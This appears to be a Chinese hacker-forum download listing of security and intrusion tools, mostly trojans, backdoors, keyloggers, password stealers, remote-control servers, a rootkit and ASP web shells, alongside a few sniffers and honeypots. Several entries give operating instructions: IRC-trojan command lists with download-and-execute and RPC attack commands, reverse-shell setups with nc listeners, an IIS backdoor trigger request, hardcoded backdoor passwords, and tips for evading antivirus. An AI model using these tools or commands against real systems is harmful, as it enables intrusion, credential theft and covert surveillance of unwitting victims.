2）低成本，KFSENSOR会在被攻击时以假睡眠方式来“欺骗”攻击者，并且只使用了极少的处理时间与网络资源。 它安装在用户的计算机时是不会影响其他程序的正常进行的，并且不需要其他附加的硬件。

3）使用简便。当你使用了KFSENSOR时就会很快得发现到这一点了。它的配置与操作到是以直线的“方向”进行的， 这只需要你看看说明，修改一下就可以正常使用了。

4）实时探测功能。只要在运行此程序，报告攻击与分析结果都会在很短的时间里完成。

5）探测未知的数据攻击，KFSENSOR不像其他的产品，它是不会依靠已知的攻击类型数据去探测的，它可以动态得探测其他新型的攻击。

6）安全的“渗透性”。KFSENSOR可以补足其他安全产品的不足，并提供附加层次的安全性。

7）只要一个管理员就通过配置监视与管理整个组织的HONEYPOT监视器了。

Ethereal 0.9.12
这是一款免费的网络协议分析程序，支持Unix、Linux、Windows，它可以直接从网络上抓取数据进行分析，也可以对由其他嗅探器抓取后保存在硬盘上的数据进行分析。你能交互式地浏览抓取到的数据包，查看每一个数据包的摘要和详细信息。Ethereal有多种强大的特征，如支持几乎所有的协议、丰富的过滤语言、易于查看TCP会话经重构后的数据流等。这里提供的是WINDOWS平台下的版本，若需
要其它系统的版本请自行访问作者主页下载。

网页密码记录机0.1A测试版
可以记录网页中的各种用户名和密码，因此不单是可以对邮箱有效，对其它需要验证的例如论坛等都有效。（针对IE）

 

ComLog 1.01
这个工具可以在后台监听所有调用cmd.exe的动作,记录到/winnt/help下的一个指定目录,这对监控服务器安全运行状况非常有帮助. 使用前把Winnt/System32/目录下的cmd.exe改名cm_.exe，把comlog101拷贝到Winnt/System32/下，然后转到Winnt/Help/创建一个新的目录用来保管ComLog历史文件就可以了。内含perl源程序。

 

Hiddukel VI pro
Hiddukel 系列的 VI -NinJo- 加强版，汲取保留了前几个版本的所有功能和优点，减少了生成的客户端的体积，增加了直接截取内存数据的全新功能，并提供了发送邮件时是否进行进程插入的选择。

盗密高手1.0
监视被监视端(装了此程序的电脑)上QQ、邮箱等各种密码，并发送到您设置的邮箱。

第一次运行本程序时进入设置对话框进行设置，发送、接收信箱经过加密处理，请务必填准确否则可能无法接收到邮件。选取“下次启动时隐藏”在下次启动时就不会出现启动界面。
确定后，您可以测试您设置的发送、接收信箱是否可用，测试成功将会收到一份确认信，一切完毕后退出重新运行该程序即可！

Family Key Logger V2.50 注册版
Family Key Logger V2.50 注册版，你可以用来监视你不在的时候，你家人或单位同事使用了你的电脑干了些什么，它是你最好的选择。你可以在选项里边设置，开始就隐蔽运行或者隐瞒在任务列表...

 

proDETECT 0.1 BETA
proDETECT 0.1 BETA，它使用ARP小包裹分析技术检测适配器在混杂模式，管理人员可以用它来扫描局域网内的嗅探器（比如他人非法使用了局域网终结者），能进行周期性规则扫描，包括高级的报告能力比如SMTP...需WinPcap支持工作，可以在http://www.chinesehack.org/down/show.asp?id=2778下载。内含源文件

。

EasyPassToFile Version -1+ Beta
运行本软件，将在同一目录下生成 EasyPass.txt 文件，该文件内有取得的密码和信息。
运行后可以取得本机上的 Outlook Express 的邮箱信息，邮箱密码。IE 5 的自动完成保存的密码。
使用 IE FTP 保存的登陆密码等。

EasyPassToFile Version -1+ Beta !
解决：远程使用时，由于不是当前用户，不能访问 HKEY_CURRENT_USER 而不能获得信息的问题。

具体请说明。

感谢作者提供。

Blackart v0.93
在Data Link层实现对网卡封包的捕获，并解析Ethernet和IP, TCP, UDP, ICMP header
本软件需要WinPcap 3.0，可在本站下载
http://www.chinesehack.org/down/show.asp?id=2778

 
 

黑客在线感谢您的参与
 
 
 
[小广播]要在本地购买杂志的读者注意了看我们在各地的代理商以及电话联系方式，可以直接与他们联系购买杂志。点击这里即可观看各地代理商电话。　
头衔：入侵无痕

 
    

 

Hiddukel VI Beta 1.0
针对指定软件的监控工具，可以取得指定软件的输入信息及资料，请不要非法盗取他人帐号及私人资料，并请在当地法律容许的范围内使用。
这个版本增加了通过代理服务器发送截取结果的功能。

Port Logger V1.2
这程序是用来监视某一个特定的TCP端口的连接情况，并将连接写入文件的程序。

这个不算是黑客程序，只能算是一个安全检测的程序罢了。程序改进了在最初版

使用的流程.
最初流程:
1.枚举系统端口被连接的情况(相当于netstat.exe -an的功能)
2.查找要监视的端口是否被连接，如果没有，跳到第4步.
3.将连接的IP和检测时间写入文件
4.程序睡眠60秒，60秒后重复第1步.

现在版本的流程
1.实时启动sniffer的功能，如果没有发现任何要监视的端口的连接，重复第一步;反之，跳到第二步。
2.枚举系统端口被连接情况,查看是否有新的连接，或者旧的连接断开，如果有，记录下来；如果没有的话，不记录，重复第1步。

最新版本的比旧版本的优点在于实时性，只要有新的连接，就会马上检测，旧版本是要睡眠60秒后才自动检测，如果连接从连接上到断开是在那个60秒内，那么无法记录到的了。

用法：
直接执行那个程序。默认是检测终端的连接情况的,如果想监视其它的端口，就将要监视的端口写到Port.txt那个文件中去，只能是写一个端口.Port.txt要和那个可执行程序放在同一个目录中去。所有记录会输出到一个叫LogFile.Log中的文件中去。

因为程序并不属于黑客程序，所以运行时还是会弹出一个窗口的(如果你是在界面双击的话)，但如果在命令行中执行，程序输出banner和要监视的端口后，就会在后台默默工作。程序只是占有很少很少的系统资源的，这在几台系统中测试过的了。

感谢作者提供。

TCPView 专业版 v1.06
TCPView Professional Edition v1.06，可连续实时的监视在Windows系统上所有的TCP/IP 活动，通过TCPView Pro 系统，系统管理者可以看到针对特定应用程序所发送和收到的信息...

Ace Password Sniffer v1.1破解版
Ace Password Sniffer v1.1，用来在局域网内捕获网络上的各种用户名和密码。支持smtp，pop3，ftp，telnet，http。并且支持大多数通过网页提交的密码。特别适合于家长对孩子网络访问的监控，网络管理人员对网站密码的管理，以及经理对手下员工进行监控...

水若兰汀1.4版
这个工具是<血火2.1>的姊妹版，可以监视指定程序，记录下帐号，密码等。仅供学习和研究之用，因使用本程序而产生的一切不利影响，均由使用者自己负责！
程序采用进程监视技术，理论上支持WINDOWS 9X下所有程序。如：<传奇>(可以记录下区号)，等等。支持邮箱接受收记录。

 

MiniSniffer 1.0
基于W2K的网络嗅探器MiniSniffer(1.00)
W2k下使用，能够监听局域网上所有的数据包，并对接受到的数据包进行协议解析，给出原始网络数据，有助于进行网络程序的调试和学习。

 

Hiddukel V pro
针对指定软件的监控工具，可以取得指定软件的输入信息及资料，请不要非法盗取他人帐号及私人资料，并请在当地法律容许的范围内使用。
该版2002/11/23发布，在原基础上增加了保存/载入设置，智能DLL插入有效规避防火墙，中文键盘输入截获，指定窗体截取的对列表框的功能等...加上保留了以前版本的自定义截图及URL触发，自我卸载，非键盘记录截取，指定窗体监控，自定义查杀进程等功能。

 

密码保护

者2.1
密码侦探类程序的克星，密码反侦探。本程序可以对普通应用程序的密码进行保

护。可以很方便地检测你的计算机上是否有密码侦探程序在使用。非注册码提供

被侦探程序名称。注册版提供侦探程序的详细信息并可以杀死侦探程序。

 
这两天不知道为什么心情闷郁...所以都没把软件放上..screen.width-366)this.width=screen.width-366" border=0>

 

PcShare V2.0 beta1
本远程控制软件为客户连接的反弹方式，由客户主动连接服务器，通信方式为HTTP隧道，可以控制局域网内部的机器。
控制功能包括屏幕控制，文件操作，注册表编辑，窗口管理，进程管理、服务管理、按键记录、文件查找等大部分功能远程控制功能。
文件传输支持多文件下载，并能断点续传。
详细情况请见软件的帮助。

 

Rewind 1.0
一款国外木马，压缩后97KB，比较小，不过功能也比较少，功能有对话、获取主机信息、与对方开玩笑，上传文件，SIN通知等。

 

风雪3.0
风雪3.0版。国产远程控制程序，此版主要是增加了一个远程反安装的功能（在使用说明的第2点有说明），同时加上了屏幕控制时自动传送的功能，解决了每次都要重新抓屏的缺点。

 

Devil4
Devil4[魔鬼4号]
Devil4是一个线程插入后门程序，是在Devil3的基础上改进而来的。主要做了以下修改：
1、可以让用户自己配置后门的端口、密码和后门需要插入的进程。
2、运行后立即生效，不再需要重新启动。程序自带了清除工具。

 

yulihubot 1.1
IRC木马,改了几个bug，加了键盘记录。

@@sysinfo //查看系统信息
@@verinfo //查看版本信息
//@@sysinfo和@@verinfo在验证密码之前可以用。下面的命令就得验证密码之后才可以用
@@login password //登录服务端
@@pass 旧密码 新密码 //改变服务端的密码
@@netinfo //查看网络信息
@@reboot //重启
@@shutdown //关机
@@forcedown //强制关机
@@logoff //注销用户
@@close //服务端断开与IRC的连接
@@remove //删除服务端
@@chdir 路径 //@@chdir c:/windows
@@dir //列目录
@@copy 源文件名 目的文件名 //用 @@exec copy 源文件 目的文件名比较好。
@@runshow 程序名 //运行可执行程序
@@runhide 程序名 //后台运行可执行程序
@@delete 文件名 //删除文件
@@exec //运行DOS命令，如 @@exec ipconfig /all 用一些命令时还存在着问题。@@list //列进程
@@kill pid //杀进程 如@@list得QQ的进程pid为2104,那么杀QQ为@@kill 2104
@@logout //退出服务端登录
@@join #房间 //进入IRC房间
@@part #房间 //离开IRC房间
@@nick user //更改服务端的昵称
@@say room sothing //某人的名称(或者是房间的名称，房间的话加#)
// say #mmbest hello, everyone
@@webdl url *.exe //从指定URL下载文件，*exe的是下载后存放的路径+文件名
@@updata url //从指定URL升级服务端.
//@@updatahttp://www.mmbest.com/mm.exe
@@kick #房间 要踢的人的名字 //踢人
@@rpc ip port(135或者139) //rpc攻击 发送两次
@@scanport ip ip port
//@@scanport 192.168.100.1 192.168.120.1 1433
//这一个命令测试中,记得不要打错命令，不是很需要的话不要用。可能 让服务端崩溃。
@@remove 删除服务端
@@keylog 键盘记录
@@unkeylog

一些命令用法举例
@@keylog c:/test.txt
把键盘记录到C盘的test.txt下。
@@unkeylog 取消键盘记录
@@dir列出的文件区分是否目录等等。
@@chdir I:/
进入到I盘
@@dir
列出当前目录文件
@@exec ipconfig /all
@@exec 后接DOS命令，这里得到网络详细信息。
@@exec type english.txt
查看 english.txt 的内容
@@list 列出进程
这里杀掉QQ
@@kill 4384 , 4384为@@list得到的QQ的PID。

 

NTbindshell
不被任何软件查杀! 注册为服务! 自定义端口!
在使用之前先把他copy到system32目录下
移除服务端:运行Regedit.exe然后删除
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/RSMSS, 再重启计算机。
Backdoor usage:
normal (listen) mode: rsmss
reverse-connect mode: rsmss

 

Hacker defender - 黑客守卫者0.8.4
内核级后门软件，用户可以通过本软件隐藏文件、进程、系统服务、系统驱动、注册表键的键和键值、打开的端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动，并且隐身地控制被隐藏进程。程序安装隐藏后门，注册隐藏系统服务并且安装系统驱动。该后门技术允许植入Redirector。鉴于参数过多，不推荐新

手使用，内有详细中文说明。

 

海阳顶端网asp木马红粉佳人版
增强了asp木马好几个功能
这个版本有两个密码,密码第一个是makelove,第二个是haiyangtop.126.com,用记事本打开lcx.asp查找替换这两个单词就可以改成别的密码了。

 

Crnet v1.1
Crnet是一个小巧的远程控制软件运行于WINDOWS系统,该软件的目的是为在局域网和因特网上远程管理主机.界面简单.功能还有待增加。

1.客户端220K服务器端50K.

2.Crserver端运行时CPU占用率极低,在资源管理器状态几乎不占用CPU,屏幕动态捕捉时占CPU少于30%!

3.屏幕动态捕捉时图像效果极佳,就象在本地显示一样,原因在于本软件采用的屏幕传输方式不是BMP或JPEG,而是类同于电视电话之原理.可用本地鼠标键盘控制对方屏幕.为远程管理提供了最大的方便!

4.资源管理器和微软的一样,右键功能可完成你想要的所有功能.这也是本软件远程管理的最大优点！

5.按键捕捉.密码自动识别.

6.服务器参数可在线动态设置.IP地址及其变化时的自动通知.

7.一般控制.如:屏保密码获取,发送消息,进程控制,文件查找,自动关机及重启等!

8.因为本软件只为方便远程管理使用，并不是做为木马使用，所以清除也很方便-开始-运行-msconfig-把CheckDll.exe-前面的钩去掉并重启动OK!要使用的时候又运行Crserver.exe既可！

9.如果你想把他当木马使用你也可以把服务端捆绑系统XX或者写到*.ini等其他方法,服务端用UPX1.20压缩如果要被查杀请自行解压使用其他处理方法躲过查杀.

 

remote desktop connection
比Terminal Server的客户端连结管理器方便的Remote Desktop Connection。

比起用Remote Admin管理性能要好很多，而且可以非常快速的切换端口，像优秀后门一样隐蔽。

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]

PortNumber值，默认是3389，改成9393或其他端口后。
使用remote desktop connection
不要导出，再用UltraEdit修改那个.cns文件，然后再导入那么麻烦了，
http://www.patching.net/abu/gongfang/admin/terminal/
缅怀一下.abu 的方法Computer：61.129.*.* IP地址 默认连接端口为3389，可以在IP地址后:端口61.129.*.*:9393
快速改变连接的端口：）特别适合拥有大批量Windows服务器的大型网络游戏、电信的管理人员使用：）
Good Luck
 
 

黑客在线感谢您的参与
 
 
 
[小广播]要在本地购买杂志的读者注意了看我们在各地的代理商以及电话联系方式，可以直接与他们联系购买杂志。点击这里即可观看各地代理商电话。　
头衔：入侵无痕

 
    

魔法控制2.5
魔法控制是一个强大的远程控制软件,具有以下特点 魔法连接技术
当被控制端上线后,会自动连接到控制端.无须IP搜索
断点续传文件
可以象flashget工具一样断点传输文件
桌面快速刷新
可以让你方便快捷得对远程桌面进行管理操作
能穿过防火墙
可以在局域网外对局域网内的电脑进行控制
可以穿过软件防火墙

魔法连接技术
动态域名方式 动态域名是指向控制端IP的域名
mail方式 只要有电子邮件就可以使用他
FTP方式 有支持FTP的个人主页就可以选择他 文件管理
能对远程文件系统方便管理
删除,重命名,移动文件。上传下载文件或文件夹
文件查找，远程运行
断点续传文件
文件压缩传输

桌面管理
桌面快速刷新 象控制自己电脑一样控制远程的电脑
发送消息
键盘输入

系统管理
dos控制台
注册表编辑
查看窗口
查看进程
键盘记录
鼠标锁定
重启，关闭电脑

 

August10
功能简单的远程控制软件，C_InclinedRoad 是客户端、InclinedRoad 是服务器端、ClearInclinedRoad 是服务器卸载程序。端口默认是1011，运行清除程序后，需要重新启动计算机才能完全清除。

 

Devil3
后门程序 Devil3
这个程序使用了线程插入技术，可以把后门程序以dll文件的形式插入到系统关键进程当中，使后门更具隐蔽性。程序运行后，每次开机自启动，把自己插入到系统关键进程 svchost.exe 当中，然后开放端口820等待连接

。使用Telnet程序便可控制该后门。程序运行环境为Windowns 2000。
注意：程序在第一次运行的时候，不能创建后门，需要在重新启动计算机后才能正常创建后门。

 

Spook 远程控制3.0版
客户端程序[ Spook.exe ]，在本地计算机上使用，可以发送控制命令，来控制安装了服务器端程序的远方电脑。打开客户端程序以后填写上安装了服务器端程序电脑的IP地址、端口、连接密码，然后就可以点击连接。连接成功以后，可以对远程电脑做一些简单的控制(例如上传、下载、运行、删除对方电脑上的文件)；服务器端
程序[ Server.exe(可以随意改名) ]，在远程计算机上使用，用于安装在需要远程控制的电脑上面，双击即开始安装，安装时程序隐藏窗体，无任何变化，具有一定的欺骗效果。安装过程中，程序把自己注册成为系统服务，拷贝自身到系统文件夹中，以后每次开机能自动后台运行；清除程序[ Clear.exe ]，为清除服务器端程序
，双击即可清除服务器端程序。
内含IPMail.exe----动态IP邮件通知软件

Remote-Anything v4.9.29
Remote-Anything v4.9.29注册版，内包括Master.exe-客户端、Slave.exe-服务端、uninstall_slave-服务端卸载软件等文件，其作为一款远程控制工具，其功能非常强大，能让我们控制使用局域网或互联网上远程的PC，具有远程文件传送、能实时抓屏、编辑注册表、控制关开机、文本聊天等功能，且服务端大小只有84.7KB，
默认端口4000，如同pcanywhere，永远不会被病毒软件查杀。

 

Remote-Anything v4.9.29
Remote-Anything v4.9.29注册版，内包括Master.exe-客户端、Slave.exe-服务端、uninstall_slave-服务端卸载软件等文件，其作为一款远程控制工具，其功能非常强大，能让我们控制使用局域网或互联网上远程的PC，具有远程文件传送、能实时抓屏、编辑注册表、控制关开机、文本聊天等功能，且服务端大小只有84.7KB，
默认端口4000，如同pcanywhere，永远不会被病毒软件查杀。

 

rmtSvc2.3.3
remoteCtrol2.3.3国内第一款B/S方式的远程控制工具，纯绿色软件无需安装，客户端可为IE或mozilla浏览器，无论你身在何方即使带宽窄，即使在linux系统下只要通过浏览器你就可以方便快捷的远程控制你的机器,支持远程登录、shutdown/restart，动态实时刷新等.
本软件内置FTP服务，使你上载/下载文件更方便。
本软件内置代理服务，可以通过它方便的访问远程被控主机网内的其它主机。
还有其它功能等待你的发现...

● 如何运行rmtSvc?
根据运行参数的不同rmtSvc既可以服务方式运行也可作为一个控制台程序运行.
用法: rmtSvc [options]
options:
-i 安装rmtSvc作为一个自动运行的服务,计算机重新启动时会自动运行.
-u 从服务控制台(SCM)卸载rmtSvc服务.
-s 启动rmtSvc服务.你也能从服务控制台(SCM)或命令行以net start rmtSvc启动此服务.
-e 停止rmtSvc服务.你也能从服务控制台(SCM)或命令行以net stop rmtSvc停止此服务.
-d 启动rmtSvc作为一个控制台程序.按下Ctrl+C停止rmtSvc.当控制台窗口被关闭时，rmtSvc自动结束.
-f 启动rmtSvc作为一个faceless控制台程序.当控制台窗口被关闭时，rmtSvc不会结束。你只能通过浏览器停

止它.detail
访问rmtSvc:
本远程控制软件为B/S模式，无需安装客户端，你可以通过任意的IE浏览器访问被控机器，当然推荐使用IE5.0

及以上版本.在IE的URL地址栏中输入:http://rmtSvc-IP:rmtSvc-Port/' 即可.
rmtSvc-IP: 运行rmtSvc服务的被控计算机IP.
rmtSvc-Port: rmtSvc服务的端口,默认是7776. 你可以通过控制界面修改它.

 

粉色信鸽 V2.4
一个典型的c/s远程控制类软件.具有文件管理、注册表管理、进程管理、屏幕和鼠标直接控制以及其他综合管理功能。其中注册表管理功能相当强大、齐全，所有操作与本地管理注册表一样方便。文件传输方便，支持拖放上下传整个目录。新增窃听QICQ消息功能。无论是发消息还是收消息，无一错漏.软件包中不含服务端。服务
端可由客户端生成和设置各种默认参数。

 

动鲨网页木马生成器
动鲨网页木马生成器，看名字就知道是什么了。

 

Spyworm v5.0
Spyworm v5.0，是一个间谍和可控的Script，称作IRC木马。它基于mIRC，并且由mIRC Scripting语言编写（这实际上就是一种改进了的C语言，适合mIRC）。Spyworm能够转向任何可见或不可见的信息，比如动作（加入、身份、通知、传送等）、消息（询问、DCC聊天等）并且允许用户发出指令，比如：相映地给出mIRC支持的任何
指令，并在设定条件下运行指令。

 

BlueAngel v0.1
BlueAngel v0.1可以根据需要生成主动连接和端口反弹两种后门。

反弹后门可以用NC在自定义的端口监听。

For Example:

如：自定义端口1983

Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:>nc -l -p 1983

BlueAngel v0.1
BlueAngel=>

OK，反弹后门连上。在*NIX上可以使用LINUX版的NC

主动连接，可以直接连接，或者借助第三放连接工具。

For Example:

如：自定义端口1983

Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:>telnet 127.0.0.1 1983

BlueAngel v0.1
password:

也可以用NC连接！

每次配置生成一个服务端和关于服务端配置的Configure.txt文件

注意：由于线程的原因，有时连接服务端，没有出现提示信息，请正常输入密码，可正常使用。主动连接超时时间为10s，连接后请尽快输入密码。

使用说明：

BlueAngel=>

为提示符~

BlueAngel命令说明(不区分大小写)

help 显示帮助
exit 退出BlueAngel
catch 抓取屏幕，图象保存在C:/catch.bmp
open cdrom 弹出光驱
close cdrom 关闭光驱////注：可能等待时间长一点
open ftp 打开FTP服务////注：请使用命令行FTP客户端，图形界面FTP不支持
close ftp 关闭FTP服务
open http 打开HTTP服务
close http 关闭HTTP服务
list 枚举远程系统进程
kill [PID] 杀死指定的远程系统进程//[PID]为进程号
shell 启用命令行控制
peek 查看当前剪贴板内容
hide 隐藏桌面和任务栏
show 恢复桌面和任务栏
lock 锁定鼠标，禁止功能键
unlock 恢复鼠标，功能键
reboot 重启远程计算机
logoff 注销远程计算机
poweroff 关闭远程计算机电源

软件包里面附带NC.EXE

 

PortLess BackDoor V1.1
一个使用svchost.exe去启动,平时不开端口,可以进行反连接的后门程序(和小榕的BITS是同一类型的后门).这里先要对bingle致万二分感谢,没有他开放的svchostdll的代码,就不会有这个后门的出现,后门中有三分一代码是bingle的代码,所以banner只会显示PortLess BackDoor这样字眼.除了有上面的特点外，还加入了相当部分的功能在这后门，加入的功能分别是:
1.检测克隆帐户
2.清日志
3.克隆帐户
4.删除系统帐户(内建用户Guest,Administrator都能删除)
5.枚举系统帐户
6.http下载
7.安装终端
8.查看系统所有IP
9.注销系统
10.关系统电源
11.重启
12.关闭系统
13.查看系统信息
14.查看或修改终端端口
……

 

C.I.A 1.21
C.I.A(Cruel intentionz administrator) v1.21
用vb编的功能非常强大的外国木马，具有多种自载启动设置，如：Registy Run、Registy Run Services、

Active X、System.in、Win.ini、Explorer Run、Windows NT Run，可以自定义在加载时杀掉某进程（对kill

防火墙很用），控制功能也非常强：文件操作，注册表操作，远程进行操作，屏蔽监视，键盘记录……等等，

并有远程卸载功能，可以放心自己测试。

 

zzz种植者 2.0
一个使用批处理写的小程序，在知道远程主机IP地址与用户名密码的情况下可以直接远程运行程序。
与其他批处理程序有所不同的是，你不用麻烦的切换到cmd下运行，而是可以像其他windows程序一样直接双击

打开。

 

trojan friend 1.0
服务端大小14.421 bytes，添加文件到C:/WINDOWS/TEMP/mmdllmm.dll（98系统）下，可以捆绑、更改ICON、以及绕过防火墙下载指定文件并且运行。

 

aspdoor.zip
asp后门生成工具。

 

BO2K 1.3
这个不用说了吧，地球人都知道了，最新版的，玩玩吧，我的瑞星最新病毒库还未能查杀，真不知怎么搞的。

 

muTelnet v2.0.1
一款手机上的TELNET终端!相当不错,可以随时随地的TELNET了!支持SIEMENS S57 SL55 M55和Palm OS!!

 

零点黑客　1.0
这是一个远程控制软件。功能比较强大。具有远程截图、远程文件操作、关闭重启注销远程计算机、远程进程操作、远程窗口操作、得到远程计算机信息以及远程操作计算机如同使用自已本地计算机一样方便。且软件界面风格具有仿XP风格、比较美观。

 

 
 

可视化的 NC 1.0
图形界面的 NC
VNC 是一个类似于原 NC 的软件，是窗口介面的，比原来命令行介面操作简单多了，你不再需要记那些烦多的参数，而只需要输入一些如IP、端口等信息，然后再按一下相应的按钮就可以了。 它可以当 TELNET 用，也可以指定在本机的某端口侦听并接受连接，连接成功后，你可以自己输入要发送的数据。举个例子，如果你懂得
SMTP、POP 等协议的话，那你足可以使用这个 VNC 来登录到服务器，然后输入一行一行的命令进行邮件的收发。当前，它还可以应用到其它协议上的，这就是它的好处了。

 

rexec client
windows下通过512端口控制linux机器(要知道用户/密码)

 

VNC 4.0 Beta 3
这是款鼎鼎有名的远程管理工具，类似Win2000的终端服务，相对于其它管理工具，有自己不少的特点，
1：客户端活动如掉线不会影响到服务端，再次连接就可以了；
2：客户端无需安装，甚至用IE等浏览器就可控制服务端；
3：最大的优点就是真正跨平台使用，你可以在WINDOWS下用客户端远程控制UNIX，反之亦然。默认端口是5800、5900，该版本是运行在x86 Win32 下的完整安装包，可自行选择安装服务端或客户端。

 

iis_backdoor.rar
将本软件放在服务器上运行即可安装后门，通过IIS端口（一般是80）连接，
可以穿透防火墙。
连接方法：

打开NC，键入命令： -vv IP地址 80
当提示连接80端口后键入命令：get /%08/df.lh (df.lh可以随便添，只要后缀是lh即可）
就会提示we got it，然后可以运行命令了。
如果系统发生错误，只要将%systemroot%/system32/inetsrv/metaback/metabase.bin
复制到%systemroot%/system32/inesrv/下覆盖即可恢复。

 

DameWare NT Utilities v3.71.0.0
DameWare NT Utilities v3.71.0.0 注册版这是一款功能强大的Windows NT/2000/XP服务器远程控制软件，只要拥有一个远程主机的管理帐号，就能使用它远程GUI下登陆交互控制主机...

 

ICMP后门 1.0 测试版
ICMP后门 1.0 测试版（for win2000/nt/xp/2003)
软件说明：
本后门利用ICMP通道进行通信，所以不开端口。一次安装成系统服务，开机自动运行。可以穿透一些防火墙。
icmpsrv.exe ：服务端程序，使用 -install（-remove御载）参数安装成服务。
icmpsend.exe ：客户端程序。使用icmpsend IP进行控制。

ICMP_Backdoor命令说明：

[http://xxx.xxx.xxx/admin.exe -hacker.exe]
下载文件，保存在//system32/目录下，文件名为hacker.exe。参数hacker.exe，前面的“-”不能省去
[pslist] 列出远程主机的进程名称和pid
[pskill id] 杀进程号为id的进程
输入普通cmd命令，则远程主机执行相关命令。
程序有bug，偶尔会显示前一个命令执行的结果，但命令的确被执行了。这时相应退出程序，再重新运行，可以恢复。也许这是因为网络延时的缘故。

 

冰河8.2版本之逸仙专版
本版能够躲避所有防火墙的查杀，因为注册表和运行后的名称还有进程名都为ShellScrap.EXE，所以隐蔽性很强，win32.exe为server程序，由于经过精细修改，可以获取对方所有输入过的口令。通用密码为12211987（修改者的生日）。

 

WinShadow v2.0.1.71
WinShadow v2.0.1.71 注册版
这是一款优秀的远程计算机控制软件，可以管理远端的PC、服务器包括屏幕、键盘，鼠标。

 

Ultr@VNC Release Candidate V1.09 汉化版
Ultr@VNC 结合各家所长的免费远程遥控软件, 让你能以有限的网络带宽，连接分隔两地的计算机，让你直接操控远程计算机的桌面，也可以用浏览器当成操控的接口。

 

WinVNC V3.3.7 汉化版
WinVNC V3.3.7 汉化版
著名的远程控制软件
这是简繁体双语版
该软件可让你远程遥控的电脑，WinVNC是VNC (Virtual Network Computing)众多操作平台版本中的一员，它可

以安装在Windows中而让使用者在世界各地远端遥控自己的电脑，就算是遥控不同的操作平台也没有问题喔！，

解压缩WinVNC后，可以看到其中包含两个资料夹[winvnc]及[vncviewer]。其中[winvnc]中的是Server的安装程

序，可以安装在远端电脑以提供远端连线的服务。而[vncviewer]中只有一个客户端的viewer程序，可以透过这个vncviewer的程序来连上[winvnc]Server。VNC现在包含下列不同操作平台的版本，可到其主页下载。

 

Trail Of Destruction 2.0
Trail Of Destruction 2.0，特洛伊木马，具有屏幕捕获、KEY记录、查阅系统信息、菜单编辑、文件下载上传、硬盘浏览、关闭程序、桌面操作、开关光驱、网页浏览、任意定义服务端口等功能。
以下内容只供参考：
服务端：C:/WINDOWS/CSRSS.EXE 大小：283.979 bytes
端口：TCP 1980
启动：HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run "csrss.exe" 以及

HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run "EXPLORER.exe"
添加文件到：C:/Program Files/Common Files/Explorer.exe
C:/Program Files/Common Files/Devbkem32.dll
C:/WINDOWS/Bmp2Jpeg.dll
C:/WINDOWS/dsacx.dat
C:/WINDOWS/SYSTEM/Bmp2Jpeg.dll
C:/WINDOWS/SYSTEM32/Bmp2Jpeg.dll
C:/WINDOWS/TEMP/Devbkem32.dll
C:/WINDOWS/TEMP/Temp.exe
添加到注册表：HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System

"DisableTaskMgr"

 

RCMD 1.05
增加2个功能：
--------------------------------
B.ca 克隆帐号
C.Door 种植后门
--------------------------------
后门说明：增加一个“不死帐号”：IUSE_SERVER 密码为xyhack.91i.net
对于rcmd.vbs需要的主要就是拥有用户和密码。你可以自己修改用户名，
和密码。具体方法：用“写字板”打开rcmd.vbs ，--- “编辑”----“替换”
然后，分别把用户名和密码替换成自己想要的。

使用过程中一些常见问题：
1.你必须有远程主机的超级管理员组(administrators)的权限。
2.远程主机必须开了135端口且WMI服务已经启动
3.不支持98
4.脚本不利用ipc$，带来的缺点就是稳定性不高，由于不能直接调用windows的API，所以写注
册表时受到很多因素影响。所以可能出现：
Conneting .....OK!(如果是密码错误，也可出现)
后，在选择执行命令时退出脚本。
5.如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码都为空（用""表示）。
6.在使用
--------------------------------
B.ca 克隆帐号
C.Door 种植后门
--------------------------------
这2个功能时，要确定你的帐号对%windir%/system32/文件夹有写的权限。而且当管理员在本
地登陆时，有cmd的窗口闪过，请注意使用。

 

binder2
反弹式后门程序
简介：
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.

用法:

1. 在本地机器监听一个端口:

netcat -vv -l -p 80

2. 通过webShell或是别的什么运行后门:

binder2 80 youIPadd

3. 本地监听端口将截获一个来自远程主机的cmd.

注意:

程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358.
程序会复制自身到c:/winnt/下名为syslog.exe,并在
HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)

压缩包中含源码,建议按需更改代码后使用.

Code by threat. THX! screen.width-366)this.width=screen.width-366" border=0>

 

rcmd.vbs 1.04
增加了与共享相关的功能：
A.Share 1.列出共享 2.创建共享 3.删除共享
下载：http://nhlzi.02835.com/RCMD104.rar

Now chose the command>
0.quit 退出脚本
1.telnet 远程开/关telnet
2.3389 远程开3389
3.clog 远程删除所有日志
4.getf 获取肉鸡系统信息
5.pslist 例出进程
6.pskill 删除进程
7.command 远程执行DOS命令
8.reboot 远程重启肉鸡
9.slist 例出远程肉鸡上的服务信息
A.Share 1.列出共享 2.创建共享 3.删除共享
*******************************************************************************
CMD>
a

------------------
0.返回CMD> =
1.列出共享信息: =
2.创建共享 =
3.删除共享 =
------------------

 

re.rar
远程关机重启工具
使用格式如下
在cmd下或运行框写入
shut [-s/-r/-l] ip user passwd
如shut -r 192.168.153.140 administrator 123456
重启远程机子。
再如
shut -l
注销当前的用户（本地机）。
-l参数不能对远程机进行操作
-s是关机，-r是重启

基于ipc。

默认是装在system32目录下的，这个不用改的
2000以上使用。只是为了方便使用。xp有自带这个功能的。

 

Back AtTacK V1.6
典型的服务端/客户端特洛伊木马，该有的功能都有，比如开、关、引导远程计算机，打开、下载、删除任何文

件，和服务端聊天、截屏等等。
以下内容只供参考：
服务端：c:/WINDOWS/Clean.exe 大小：325.632 bytes
